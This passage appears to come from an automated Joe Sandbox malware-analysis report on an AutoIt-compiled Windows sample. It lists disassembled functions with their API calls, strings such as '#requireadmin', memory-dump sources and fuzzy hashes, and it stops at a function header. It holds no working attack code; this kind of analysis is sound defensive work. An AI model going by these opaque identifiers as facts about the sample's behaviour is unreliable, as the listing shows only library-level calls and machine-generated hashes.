Instruction Fuzzy Hash: 7541D231214352AFD720DF64EC84B5EBBE4AF95310F208A6DF8A5972D1D770E914CB52

Function 00254416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0025CC08,00000000,?,?,?,?), ref: 002544AA
GetWindowLongW.USER32 ref: 002544C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002544D7

Strings

SysTreeView32, xrefs: 0025447C

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 9c3df92d181a70a2af27949f05923f29e4c4caaba46f500be39ab89796b81117
Instruction ID: 019b00f4a4f37da5aa3759f23090312cf059187a5af6e7bc71b6122cfd306001
Opcode Fuzzy Hash: 9c3df92d181a70a2af27949f05923f29e4c4caaba46f500be39ab89796b81117
Instruction Fuzzy Hash: 5031B231260206AFDF119E38DC45BEAB7A9EB18339F204315FD75A21D0E770ECA49754

Function 00226E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00226EED
VariantCopyInd.OLEAUT32(?,?), ref: 00226F08
VariantClear.OLEAUT32(?), ref: 00226F12

Strings

*j", xrefs: 00226E8B, 00226E90, 00226EF8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j"
API String ID: 2173805711-2162809069
Opcode ID: 192e6712ce9d3d21a8436dd1ea84b64ff0f28c69e0e265c7ee899a482e191c35
Instruction ID: 38d0de1b309d18a2bed3dc62b377a23f2fdc9819f0ee85c5b00be181329e7d1c
Opcode Fuzzy Hash: 192e6712ce9d3d21a8436dd1ea84b64ff0f28c69e0e265c7ee899a482e191c35
Instruction Fuzzy Hash: 6F319072628265EFCF05AFA4F999DBD37B5EF55300B600498F8038B6A1C770D922DB90

Function 0024304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0024335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00243077,?,?), ref: 00243378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0024307A
_wcslen.LIBCMT ref: 0024309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00243106

Strings

255.255.255.255, xrefs: 00243095, 0024309A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 81640aee0b067bf0fc99e91fa2d4469fb8d9009c34e92bc73ae6838a13797332
Instruction ID: b6ddbd513e24cfa3ef97a2c7cb85a2867328b345667729bf4f599726f4dc0a8b
Opcode Fuzzy Hash: 81640aee0b067bf0fc99e91fa2d4469fb8d9009c34e92bc73ae6838a13797332
Instruction Fuzzy Hash: A931E735210206DFDB18CF68C485EA977E0EF14318F248199E9199F392D772DE55CB60

Function 00254653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00254705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00254713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0025471A

Strings

msctls_updown32, xrefs: 00254684

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 4a0e2bb12ccec251e501ac3a1a5801d9de072ddd7141576b537bd3b6358ef48b
Instruction ID: ce9ec21a5d394df676378c1edc21acac2d4358c1eb9894e838f0a4b0175acbd5
Opcode Fuzzy Hash: 4a0e2bb12ccec251e501ac3a1a5801d9de072ddd7141576b537bd3b6358ef48b
Instruction Fuzzy Hash: 0221A1B5610209AFEB11EF64DCC5DB777ADEF5A399B100049FA009B291CB70EC65CB64

Function 002295AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0022961D

Strings

#OnAutoItStartRegister, xrefs: 002295F3
#notrayicon, xrefs: 002295B7
#requireadmin, xrefs: 002295D9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: efae928b2969bd990545a3857242771e616e94ec601f8cc0b59d50a1f6947587
Instruction ID: a05b9f8b127fa605048a1ff9cb3b09d6b1172181ef593de660600379bb653a22
Opcode Fuzzy Hash: efae928b2969bd990545a3857242771e616e94ec601f8cc0b59d50a1f6947587
Instruction Fuzzy Hash: 4D21383222463276D331AE69AC02FBB73DC9F75300F50402AFA4997181EBA19DB6C295

Function 002537B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00253840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00253850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00253876

Strings

Listbox, xrefs: 0025380F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: ed0a193b82d4c53d7b7fb6755f38439ab87ba90afbf7e51d153958815f65ed31
Instruction ID: 13bc4acc658b18b005559a822cb0e73cccad286fb47c0d77a88b435374afc945
Opcode Fuzzy Hash: ed0a193b82d4c53d7b7fb6755f38439ab87ba90afbf7e51d153958815f65ed31
Instruction Fuzzy Hash: 6721F272620219BBEF11CF64DC44FBB376EEF89791F109114F9009B190C671DC228BA4

Function 002349F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00234A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00234A5C
SetErrorMode.KERNEL32(00000000,?,?,0025CC08), ref: 00234AD0

Strings

%lu, xrefs: 00234A6F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 086134984f952e7994d422dc4f136a5ee000f11183c94180b6ac52cb53f95805
Instruction ID: 6b4e6d2d6df0c92a2f62abcea70bd248d7a1c361888390decccfdc1ae1c2e617
Opcode Fuzzy Hash: 086134984f952e7994d422dc4f136a5ee000f11183c94180b6ac52cb53f95805
Instruction Fuzzy Hash: C4315175A00209AFDB10DF54C885EAA7BF8EF09308F1480A9F909DB352D771EE55CBA1

Function 002541EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0025424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00254264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00254271

Strings

msctls_trackbar32, xrefs: 00254226

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1e252ee05f7fada45bb7afe7b853188e13ca09d10f2b64021ae2bf6208caae1d
Instruction ID: 24ec9d2cfecff84dc380910ec906185028d6c013e32a59c94855cfe5331c6e3d
Opcode Fuzzy Hash: 1e252ee05f7fada45bb7afe7b853188e13ca09d10f2b64021ae2bf6208caae1d
Instruction Fuzzy Hash: A5110631250309BEEF206F29CC06FAB7BACEF95B69F114114FE55E2090D2B1DC619B24

Function 00222F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

Part of subcall function 00222DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00222DC5
Part of subcall function 00222DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00222DD6
Part of subcall function 00222DA7: GetCurrentThreadId.KERNEL32 ref: 00222DDD
Part of subcall function 00222DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00222DE4

GetFocus.USER32 ref: 00222F78

Part of subcall function 00222DEE: GetParent.USER32(00000000), ref: 00222DF9

GetClassNameW.USER32(?,?,00000100), ref: 00222FC3
EnumChildWindows.USER32(?,0022303B), ref: 00222FEB

Strings

%s%d, xrefs: 00222FFF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: f88e95663e754e330346ff6f5031c88e7546733554bb56acf4a444faf6a1b356
Instruction ID: 91b22fdd4b5866e3789acf07d6e9cafaebab0fea0f4fa8019585a2ff8734f7e6
Opcode Fuzzy Hash: f88e95663e754e330346ff6f5031c88e7546733554bb56acf4a444faf6a1b356
Instruction Fuzzy Hash: 0D11C071210215BBCF00BFA0AC95FED37AAAF94304F044079B9099B292DE759A598B70

Function 00255882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002558C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002558EE
DrawMenuBar.USER32(?), ref: 002558FD

Strings

0, xrefs: 0025588F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 166a8b1d11ed39f88c32fa0f4a7f4bac38d40a8ab16f55a0baaa3edf6837afe1
Instruction ID: ee1486b764442c0e3cb247e3e3f3c57f8c05a731549203b3ee62b8b1964d3b4b
Opcode Fuzzy Hash: 166a8b1d11ed39f88c32fa0f4a7f4bac38d40a8ab16f55a0baaa3edf6837afe1
Instruction Fuzzy Hash: D901C431510228EFDB109F51DC44BAEBBB4FF45362F108099E849D6261EB308A94DF64

Function 0021D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0021D3BF
FreeLibrary.KERNEL32 ref: 0021D3E5

Strings

X64, xrefs: 0021D2A8
GetSystemWow64DirectoryW, xrefs: 0021D3B9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: bbf9dfa26396d302cfa5634827f5c0cc0c72cd462005b4e58a2e485df093ad5d
Instruction ID: 21a817e4a4e08412511ca121d2e73da5212fa7f2493ee7cc143ebd1646439ca9
Opcode Fuzzy Hash: bbf9dfa26396d302cfa5634827f5c0cc0c72cd462005b4e58a2e485df093ad5d
Instruction Fuzzy Hash: E8F0EC75435B22DAD7385E108C889E93398AF31701B64859AF437E1095EBB0C9E1CA56

Function 0022007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de12cdfc49ea1d8b74b74f7f208124742cc1925f2f34b145092f5cdc29bfae1f
Instruction ID: 0f9d54ba5a4437846633783b01076624d6c854bd9e404780692f55ceb76ad92e
Opcode Fuzzy Hash: de12cdfc49ea1d8b74b74f7f208124742cc1925f2f34b145092f5cdc29bfae1f
Instruction Fuzzy Hash: 70C17C75A1021AEFDB14CFD4D894AAEB7B5FF48304F208599E805EB252D770ED91CB90

Function 0024342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00243459
CoUninitialize.OLE32 ref: 00243463
VariantInit.OLEAUT32(?), ref: 0024346E
VariantClear.OLEAUT32(?), ref: 0024371B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 292ed7ebd49fd4fbaa5cacf9dcae75b6701dbef1db9a613330b298edd63b48ea
Instruction ID: ab0ab75b7d164ece447ca806517b1e04e54748949d7b4f266f19b8d3b7cb477d
Opcode Fuzzy Hash: 292ed7ebd49fd4fbaa5cacf9dcae75b6701dbef1db9a613330b298edd63b48ea
Instruction Fuzzy Hash: 64A125756143019FCB04DF68C485E2AB7E5EF98714F04885DF98A9B3A2DB70EE11CB91

Function 00220436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0025FC08,?), ref: 002205F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0025FC08,?), ref: 00220608
CLSIDFromProgID.OLE32(?,?,00000000,0025CC40,000000FF,?,00000000,00000800,00000000,?,0025FC08,?), ref: 0022062D
_memcmp.LIBVCRUNTIME ref: 0022064E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 4128a2b311f50823aafc4270f96526e78fd998037efb84203a3c459e833991f7
Instruction ID: 95d9b2bc586582bfdff4db080e6091f154fdf31d11f12bf453fa9781ff7bef5e
Opcode Fuzzy Hash: 4128a2b311f50823aafc4270f96526e78fd998037efb84203a3c459e833991f7
Instruction Fuzzy Hash: 07814F71A1011AEFCB04DFD4C988EEEB7B9FF89315F204158E506AB251DB71AE16CB60

Function 00201391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002014C0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1d5052e9e730004d5eae9aa761af1c6ab3ba76e969625ea67e1287053ac6cb80
Instruction ID: aebf0eb8ed95dc5fa7bd3647fac7ec66d19c4e1bfc757bb208d8dc93323a241b
Opcode Fuzzy Hash: 1d5052e9e730004d5eae9aa761af1c6ab3ba76e969625ea67e1287053ac6cb80
Instruction Fuzzy Hash: 18416C31620706ABDB217FF99C46ABE3AA4FF61330F140265F918D71E3E77488715261

Function 00256278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(014EEFC8,?), ref: 002562E2
ScreenToClient.USER32(?,?), ref: 00256315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00256382

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4476764ba34457bd6059d80a3cf89901888b0f66d8cff239e98d9db741abb038
Instruction ID: 508f39a9575873b35d601327711ae7e8b73b4bd848aa63ac1d3da2baeea26326
Opcode Fuzzy Hash: 4476764ba34457bd6059d80a3cf89901888b0f66d8cff239e98d9db741abb038
Instruction Fuzzy Hash: 54515C70A1020AEFDF10CF54D888AAE7BB5EF45761F508199FC159B2A0D730EDA5CB54

Function 00241AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00241AFD
WSAGetLastError.WSOCK32 ref: 00241B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00241B8A
WSAGetLastError.WSOCK32 ref: 00241B94

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 9c69aa9eab832b15967b6b9eb9c9cb803a11ad4a506468957548d727e6449a99
Instruction ID: ba2ff9651a12b33346457b2f50d1ee7c937d2beb7de05af2f851ac3c689e3142
Opcode Fuzzy Hash: 9c69aa9eab832b15967b6b9eb9c9cb803a11ad4a506468957548d727e6449a99
Instruction Fuzzy Hash: 8C41B135600300AFE724AF24D88AF2977E5EB58718F54844CF91A9F7D2E772DD928B90

Function 001FB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0735ed80820c565e2c104c8d98bf75afe1e216f8d4a0e4a8eed6e05333b7ca99
Instruction ID: 40d20c458fb172a7edb40738a579bc071c6815807fbf0ca92e2c494435b39398
Opcode Fuzzy Hash: 0735ed80820c565e2c104c8d98bf75afe1e216f8d4a0e4a8eed6e05333b7ca99
Instruction Fuzzy Hash: 21410875A04708AFD724AF38CC81B7EBBA9EB94710F10452EF652DB6D2D771A9118B80

Function 002356D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

